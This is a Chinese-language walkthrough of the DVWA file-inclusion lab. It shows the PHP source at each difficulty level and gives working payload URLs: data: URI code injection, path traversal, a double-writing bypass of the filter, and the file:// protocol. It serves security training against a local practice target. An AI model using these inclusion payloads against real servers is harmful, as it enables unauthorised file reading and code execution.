文件包含,未经过严格过滤,将一些恶意构造带入了包含函数,可以使用一些包含函数来包含一些其他乱七八糟的东西,要么导致任意文件读取,要么命令执行
文件包含包括远程文件包含(RFI)和本地文件包含(LFI)两种
RFI利用基本条件:allow_url_fopen = On(默认开)、allow_url_include = On(默认关,也没人闲的没事去开他)
LFI可包含共享文件,敏感目录文件,session
可包含Data:URI schema 比如?file=data:text/plain,<?php phpinfo();?> 再比如file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
如果有后缀限制,截断大法好,伪协议大法好(phar绕过上传限制、zip绕过上传限制等一堆),不过需要视具体情况判断使用条件限制
Low:
看一眼源代码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
没啥过滤筛查
三个文件,点一下包含,把文件包含进去了,返回结果告诉你一声
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=lcx.php
把include.php改成lcx.php,报错出路径(本地靶场)
根目录D:\phpstudy\phpstudy_pro\WWW\dvwa
读个phpinfo不过分吧
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=D:\phpstudy\phpstudy_pro\WWW\dvwa\phpinfo.php
如果不报错,可以
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../../../../phpinfo.php
去猜测
这是LFI
当然符合RFI的条件时,可以去访问外网网址、文件、下载链接什么的来造成代码执行
?page=url
Medium:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
”http:// ”、”https://”、 ” ../”、”..\”被过滤了
关键是用str_replace,能用双写绕过,而且防不住知道绝对路径的,无论是LFI还是RFI
High:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
要求page参数的开头必须是file
那就file协议走起
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///D:/phpstudy/phpstudy_pro/WWW/dvwa/phpinfo.php
Impossible:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
白名单防护,只能从include.php”、“file1.php”、“file2.php”、“file3.php”之中选一个,不存在任意文件包含了
